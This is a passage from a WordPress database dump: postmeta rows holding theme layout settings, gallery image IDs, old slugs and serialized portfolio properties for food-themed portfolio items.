0'),(25438,3081,'portfolio_single_back_to_link','569'),(25439,3081,'mkdf_disable_vertical_header_background_image_meta','no'),(25440,3081,'mkdf_disable_header_widget_areas_meta','no'),(25441,3081,'slide_template','default'),(25442,3081,'_wpb_vc_js_status','true'),(25443,3081,'mkdf-portfolio-image-gallery','567,566,565'),(25444,3081,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25445,3081,'mkdf_portfolio_single_template_meta','masonry'),(25446,3081,'_dp_original','583'),(25447,3081,'_wp_old_slug','h8-4'),(25448,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25449,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25450,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25451,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25452,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25453,3082,'_thumbnail_id','591'),(25454,3082,'mkdf_page_content_behind_header_meta','no'),(25455,3082,'mkdf_page_content_padding','115px 0 100px 0'),(25456,3082,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25457,3082,'portfolio_single_back_to_link','569'),(25458,3082,'mkdf_disable_vertical_header_background_image_meta','no'),(25459,3082,'mkdf_disable_header_widget_areas_meta','no'),(25460,3082,'slide_template','default'),(25461,3082,'_wpb_vc_js_status','true'),(25462,3082,'mkdf-portfolio-image-gallery','567,566,565'),(25463,3082,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25464,3082,'mkdf_portfolio_single_template_meta','slider'),(25465,3082,'_dp_original','588'),(25466,3082,'_wp_old_slug','h8-5'),(25467,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25468,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25469,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25470,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25471,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25472,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25473,3083,'mkdf_page_content_behind_header_meta','no'),(25474,3083,'mkdf_page_content_padding','115px 0 100px 0'),(25475,3083,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25476,3083,'portfolio_single_back_to_link','569'),(25477,3083,'mkdf_disable_vertical_header_background_image_meta','no'),(25478,3083,'mkdf_disable_header_widget_areas_meta','no'),(25479,3083,'slide_template','default'),(25480,3083,'_wpb_vc_js_status','true'),(25481,3083,'mkdf-portfolio-image-gallery','567,566,565'),(25482,3083,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25483,3083,'mkdf_portfolio_single_template_meta','small-slider'),(25484,3083,'_dp_original','590'),(25485,3083,'_thumbnail_id','594'),(25486,3083,'_wp_old_slug','h8-6'),(25487,618,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25488,618,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25489,618,'mkdf_page_content_behind_header_meta','no'),(25490,618,'mkdf_page_content_padding','115px 0 100px 0'),(25491,618,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25492,618,'portfolio_single_back_to_link','610'),(25493,618,'mkdf_disable_vertical_header_background_image_meta','no'),(25494,618,'mkdf_disable_header_widget_areas_meta','no'),(25495,618,'slide_template','default'),(25496,618,'_wpb_vc_js_status','false'),(25497,618,'mkdf-portfolio-image-gallery','565,566,567'),(25498,618,'mkdf_portfolio_single_template_meta','images'),(25499,618,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25500,618,'_dp_original','104'),(25501,618,'_thumbnail_id','1095'),(25502,618,'_wp_old_slug','h6-1'),(25503,618,'_wp_old_slug','cold-raspberry-soup'),(25504,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25505,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25506,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25507,3084,'mkdf_page_content_behind_header_meta','no'),(25508,3084,'mkdf_page_content_padding','115px 0 100px 0'),(25509,3084,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25510,3084,'portfolio_single_back_to_link','610'),(25511,3084,'mkdf_disable_vertical_header_background_image_meta','no'),(25512,3084,'mkdf_disable_header_widget_areas_meta','no'),(25513,3084,'slide_template','default'),(25514,3084,'_wpb_vc_js_status','true'),(25515,3084,'mkdf-portfolio-image-gallery','567,566,565'),(25516,3084,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25517,3084,'mkdf_portfolio_single_template_meta','small-images'),(25518,3084,'_dp_original','136'),(25519,3084,'_thumbnail_id','1096'),(25520,3084,'_wp_old_slug','h6-2'),(25521,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25522,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25523,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25524,3085,'mkdf_page_content_behind_header_meta','no'),(25525,3085,'mkdf_page_content_padding','115px 0 100px 0'),(25526,3085,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25527,3085,'portfolio_single_back_to_link','610'),(25528,3085,'mkdf_disable_vertical_header_background_image_meta','no'),(25529,3085,'mkdf_disable_header_widget_areas_meta','no'),(25530,3085,'slide_template','default'),(25531,3085,'_wpb_vc_js_status','true'),(25532,3085,'mkdf-portfolio-image-gallery','567,566,565'),(25533,3085,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25534,3085,'mkdf_portfolio_single_template_meta','slider'),(25535,3085,'_dp_original','141'),(25536,3085,'_thumbnail_id','1098'),(25537,3085,'_wp_old_slug','h6-3'),(25538,3085,'_wp_old_slug','that-croissant'),(25539,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25540,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25541,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25542,3086,'mkdf_page_content_behind_header_meta','no'),(25543,3086,'mkdf_page_content_padding','115px 0 100px 0'),(25544,3086,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25545,3086,'portfolio_single_back_to_link','610'),(25546,3086,'mkdf_disable_vertical_header_background_image_meta','no'),(25547,3086,'mkdf_disable_header_widget_areas_meta','no'),(25548,3086,'slide_template','default'),(25549,3086,'_wpb_vc_js_status','true'),(25550,3086,'mkdf-portfolio-image-gallery','565,566,567'),(25551,3086,'mkdf_portfolio_single_template_meta','small-slider'),(25552,3086,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25553,3086,'_dp_original','568'),(25554,3086,'_thumbnail_id','1097'),(25555,3086,'_wp_old_slug','h6-4'),(25556,3086,'_wp_old_slug','cream-soup'),(25557,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25558,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25559,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25560,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25561,3087,'mkdf_page_content_behind_header_meta','no'),(25562,3087,'mkdf_page_content_padding','115px 0 100px 0'),(25563,3087,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25564,3087,'portfolio_single_back_to_link','610'),(25565,3087,'mkdf_disable_vertical_header_background_image_meta','no'),(25566,3087,'mkdf_disable_header_widget_areas_meta','no'),(25567,3087,'slide_template','default'),(25568,3087,'_wpb_vc_js_status','true'),(25569,3087,'mkdf-portfolio-image-gallery','567,566,565'),(25570,3087,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25571,3087,'mkdf_portfolio_single_template_meta','gallery'),(25572,3087,'_dp_original','580'),(25573,3087,'_thumbnail_id','1099'),(25574,3087,'_wp_old_slug','h6-5'),(25575,3088,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25576,3088,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25577,3088,'mkdf_page_content_behind_header_meta','no'),(25578,3088,'mkdf_page_content_padding','115px 0 100px 0'),(25579,3088,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25580,3088,'portfolio_single_back_to_link','610'),(25581,3088,'mkdf_disable_vertical_header_background_image_meta','no'),(25582,3088,'mkdf_disable_header_widget_areas_meta','no'),(25583,3088,'slide_template','default'),(25584,3088,'_wpb_vc_js_status','false'),(25585,3088,'mkdf-portfolio-image-gallery','565,566,567'),(25586,3088,'mkdf_portfolio_single_template_meta','images'),(25587,3088,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25588,3088,'_dp_original','104'),(25589,3088,'_thumbnail_id','1101'),(25590,3088,'_wp_old_slug','h6-7'),(25591,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25592,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25593,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25594,3089,'mkdf_page_content_behind_header_meta','no'),(25595,3089,'mkdf_page_content_padding','115px 0 100px 0'),(25596,3089,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25597,3089,'portfolio_single_back_to_link','610'),(25598,3089,'mkdf_disable_vertical_header_background_image_meta','no'),(25599,3089,'mkdf_disable_header_widget_areas_meta','no'),(25600,3089,'slide_template','default'),(25601,3089,'_wpb_vc_js_status','true'),(25602,3089,'mkdf-portfolio-image-gallery','567,566,565'),(25603,3089,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25604,3089,'mkdf_portfolio_single_template_meta','small-images'),(25605,3089,'_dp_original','136'),(25606,3089,'_thumbnail_id','1121'),(25607,3089,'_wp_old_slug','h6-6'),(25608,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25609,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25610,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25611,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25612,3090,'mkdf_page_content_behind_header_meta','no'),(25613,3090,'mkdf_page_content_padding','115px 0 100px 0'),(25614,3090,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25615,3090,'portfolio_single_back_to_link','610'),(25616,3090,'mkdf_disable_vertical_header_background_image_meta','no'),(25617,3090,'mkdf_disable_header_widget_areas_meta','no'),(25618,3090,'slide_template','default'),(25619,3090,'_wpb_vc_js_status','true'),(25620,3090,'mkdf-portfolio-image-gallery','567,566,565'),(25621,3090,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25622,3090,'mkdf_portfolio_single_template_meta','small-images'),(25623,3090,'_dp_original','649'),(25624,3090,'_thumbnail_id','1102'),(25625,3090,'_wp_old_slug','h6-8'),(25626,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25627,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25628,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25629,3091,'mkdf_page_content_behind_header_meta','no'),(25630,3091,'mkdf_page_content_padding','115px 0 100px 0'),(25631,3091,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25632,3091,'portfolio_single_back_to_link','610'),(25633,3091,'mkdf_disable_vertical_header_background_image_meta','no'),(25634,3091,'mkdf_disable_header_widget_areas_meta','no'),(25635,3091,'slide_template','default'),(25636,3091,'_wpb_vc_js_status','false'),(25637,3091,'mkdf-portfolio-image-gallery','565,566,567'),(25638,3091,'mkdf_portfolio_single_template_meta','images'),(25639,3091,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25640,3091,'_dp_original','648'),(25641,3091,'_thumbnail_id','1103'),(25642,3091,'_wp_old_slug','h6-9'),(25643,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25644,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25645,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25646,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25647,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25648,2843,'_wp_page_template','full-width.php'),(25649,2843,'slide_template','default'),(25650,2843,'_wpb_vc_js_status','true'),(25651,2843,'mkdf_page_content_behind_header_meta','no'),(25652,2843,'mkdf_page_content_padding','30px 30px 50px 30px'),(25653,2843,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(25654,2843,'mkdf_disable_vertical_header_background_image_meta','no'),(25655,2843,'mkdf_disable_header_widget_areas_meta','no'),(25656,2843,'mkdf_title_area_type_meta','attika'),(25657,2843,'_dp_original','1192'),(25658,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25659,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25660,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25661,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25662,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25663,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25664,2857,'_wp_page_template','full-width.php'),(25665,2857,'slide_template','default'),(25666,2857,'_wpb_vc_js_status','true'),(25667,2857,'mkdf_page_content_behind_header_meta','no'),(25668,2857,'mkdf_page_content_padding','30px 30px 50px 30px'),(25669,2857,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(25670,2857,'mkdf_disable_vertical_header_background_image_meta','no'),(25671,2857,'mkdf_disable_header_widget_areas_meta','no'),(25672,2857,'mkdf_title_area_type_meta','attika'),(25673,2857,'_dp_original','2843'),(25674,3092,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25675,3092,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25677,3092,'mkdf_page_content_behind_header_meta','no'),(25678,3092,'mkdf_page_content_padding','115px 0 100px 0'),(25679,3092,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25680,3092,'portfolio_single_back_to_link','664'),(25681,3092,'mkdf_disable_vertical_header_background_image_meta','no'),(25682,3092,'mkdf_disable_header_widget_areas_meta','no'),(25683,3092,'slide_template','default'),(25684,3092,'_wpb_vc_js_status','false'),(25685,3092,'mkdf-portfolio-image-gallery','565,566,567'),(25686,3092,'mkdf_portfolio_single_template_meta','images'),(25687,3092,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25688,3092,'_dp_original','104'),(25689,3092,'_wp_old_slug','h4-1'),(25690,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25691,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25692,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25694,3093,'mkdf_page_content_behind_header_meta','no'),(25695,3093,'mkdf_page_content_padding','115px 0 100px 0'),(25696,3093,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25697,3093,'portfolio_single_back_to_link','664'),(25698,3093,'mkdf_disable_vertical_header_background_image_meta','no'),(25699,3093,'mkdf_disable_header_widget_areas_meta','no'),(25700,3093,'slide_template','default'),(25701,3093,'_wpb_vc_js_status','true'),(25702,3093,'mkdf-portfolio-image-gallery','567,566,565'),(25703,3093,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25704,3093,'mkdf_portfolio_single_template_meta','small-images'),(25705,3093,'_dp_original','136'),(25706,3093,'_wp_old_slug','h4-2'),(25707,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25708,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25709,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52282,4373,'_menu_item_icon','null'),(25711,3094,'mkdf_page_content_behind_header_meta','no'),(25712,3094,'mkdf_page_content_padding','115px 0 100px 0'),(25713,3094,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25714,3094,'portfolio_single_back_to_link','664'),(25715,3094,'mkdf_disable_vertical_header_background_image_meta','no'),(25716,3094,'mkdf_disable_header_widget_areas_meta','no'),(25717,3094,'slide_template','default'),(25718,3094,'_wpb_vc_js_status','true'),(25719,3094,'mkdf-portfolio-image-gallery','567,566,565'),(25720,3094,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25721,3094,'mkdf_portfolio_single_template_meta','slider'),(25722,3094,'_dp_original','141'),(25723,3094,'_wp_old_slug','h4-3'),(25724,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25725,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25726,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25727,3095,'_thumbnail_id','1059'),(25728,3095,'mkdf_page_content_behind_header_meta','no'),(25729,3095,'mkdf_page_content_padding','115px 0 100px 0'),(25730,3095,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25731,3095,'portfolio_single_back_to_link','84'),(25732,3095,'mkdf_disable_vertical_header_background_image_meta','no'),(25733,3095,'mkdf_disable_header_widget_areas_meta','no'),(25734,3095,'slide_template','default'),(25735,3095,'_wpb_vc_js_status','true'),(25736,3095,'mkdf-portfolio-image-gallery','567,566,565'),(25737,3095,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25738,3095,'mkdf_portfolio_single_template_meta','small-images'),(25739,3095,'_dp_original','136'),(25740,3095,'_wp_old_slug','h1-2-2'),(25741,3095,'_wp_old_slug','h2-1'),(25742,3095,'_wp_old_slug','h2-4'),(25743,3095,'_wp_old_slug','kakalamba-appetizer'),(25744,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25745,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25746,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25747,3096,'_thumbnail_id','1058'),(25748,3096,'mkdf_page_content_behind_header_meta','no'),(25749,3096,'mkdf_page_content_padding','115px 0 100px 0'),(25750,3096,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25751,3096,'portfolio_single_back_to_link','84'),(25752,3096,'mkdf_disable_vertical_header_background_image_meta','no'),(25753,3096,'mkdf_disable_header_widget_areas_meta','no'),(25754,3096,'slide_template','default'),(25755,3096,'_wpb_vc_js_status','true'),(25756,3096,'mkdf-portfolio-image-gallery','567,566,565'),(25757,3096,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25758,3096,'mkdf_portfolio_single_template_meta','slider'),(25759,3096,'_dp_original','141'),(25760,3096,'_wp_old_slug','h2-3'),(25761,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25762,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25763,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25764,3097,'_thumbnail_id','1057'),(25765,3097,'mkdf_page_content_behind_header_meta','no'),(25766,3097,'mkdf_page_content_padding','115px 0 100px 0'),(25767,3097,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25768,3097,'portfolio_single_back_to_link','84'),(25769,3097,'mkdf_disable_vertical_header_background_image_meta','no'),(25770,3097,'mkdf_disable_header_widget_areas_meta','no'),(25771,3097,'slide_template','default'),(25772,3097,'_wpb_vc_js_status','true'),(25773,3097,'mkdf-portfolio-image-gallery','565,566,567'),(25774,3097,'mkdf_portfolio_single_template_meta','small-slider'),(25775,3097,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25776,3097,'_dp_original','568'),(25777,3097,'_wp_old_slug','h2-2'),(25778,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25779,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25780,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25781,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25782,3098,'mkdf_page_content_behind_header_meta','no'),(25783,3098,'mkdf_page_content_padding','115px 0 100px 0'),(25784,3098,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25785,3098,'portfolio_single_back_to_link','84'),(25786,3098,'mkdf_disable_vertical_header_background_image_meta','no'),(25787,3098,'mkdf_disable_header_widget_areas_meta','no'),(25788,3098,'slide_template','default'),(25789,3098,'_wpb_vc_js_status','true'),(25790,3098,'mkdf-portfolio-image-gallery','567,566,565'),(25791,3098,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25792,3098,'mkdf_portfolio_single_template_meta','gallery'),(25793,3098,'_thumbnail_id','1056'),(25794,3098,'_dp_original','580'),(25795,3098,'_wp_old_slug','h2-1'),(25796,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25797,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25798,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25799,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52233,4369,'_menu_item_type','custom'),(25801,3099,'mkdf_page_content_behind_header_meta','no'),(25802,3099,'mkdf_page_content_padding','115px 0 100px 0'),(25803,3099,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25804,3099,'portfolio_single_back_to_link','1008'),(25805,3099,'mkdf_disable_vertical_header_background_image_meta','no'),(25806,3099,'mkdf_disable_header_widget_areas_meta','no'),(25807,3099,'slide_template','default'),(25808,3099,'_wpb_vc_js_status','true'),(25809,3099,'mkdf-portfolio-image-gallery','567,566,565'),(25810,3099,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25811,3099,'mkdf_portfolio_single_template_meta','small-images'),(25812,3099,'_wp_old_slug','h1-2-2'),(25813,3099,'_wp_old_slug','h2-1'),(25814,3099,'_dp_original','933'),(25815,3099,'_wp_old_slug','h7-4'),(25816,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25817,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25818,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25819,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25820,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25821,3100,'mkdf_page_content_behind_header_meta','no'),(25822,3100,'mkdf_page_content_padding','115px 0 100px 0'),(25823,3100,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25824,3100,'portfolio_single_back_to_link','1008'),(25825,3100,'mkdf_disable_vertical_header_background_image_meta','no'),(25826,3100,'mkdf_disable_header_widget_areas_meta','no'),(25827,3100,'slide_template','default'),(25828,3100,'_wpb_vc_js_status','true'),(25829,3100,'mkdf-portfolio-image-gallery','567,566,565'),(25830,3100,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25831,3100,'mkdf_portfolio_single_template_meta','gallery'),(52228,4368,'_menu_item_target',''),(25833,3100,'_dp_original','936'),(25834,3100,'_wp_old_slug','h7-1'),(25835,3100,'_wp_old_slug','vegetable-cream-soup__trashed'),(25836,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25837,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25838,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25839,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25840,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25841,3101,'mkdf_page_content_behind_header_meta','no'),(25842,3101,'mkdf_page_content_padding','115px 0 100px 0'),(25843,3101,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25844,3101,'portfolio_single_back_to_link','1008'),(25845,3101,'mkdf_disable_vertical_header_background_image_meta','no'),(25846,3101,'mkdf_disable_header_widget_areas_meta','no'),(25847,3101,'slide_template','default'),(25848,3101,'_wpb_vc_js_status','true'),(25849,3101,'mkdf-portfolio-image-gallery','567,566,565'),(25850,3101,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(25851,3101,'mkdf_portfolio_single_template_meta','slider'),(25852,3101,'_thumbnail_id','1030'),(25853,3101,'_dp_original','1021'),(25854,3101,'_wp_old_slug','h7-5'),(25855,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25856,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25857,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25858,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25859,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(25861,3102,'mkdf_page_content_behind_header_meta','no'),(25862,3102,'mkdf_page_content_padding','115px 0 100px 0'),(25863,3102,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(25864,3102,'portfolio_single_back_to_link','1008'),(25865,3102,'mkdf_disable_vertical_header_background_image_meta','no'),(25866,3102,'mkdf_disable_header_widget_areas_meta','no'),(25867,3102,'slide_template','default'),(25868,3102,'_wpb_vc_js_status','true'),(25869,3102,'mkdf-portfolio-image-gallery','567,566,565'),(25870,3102,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John 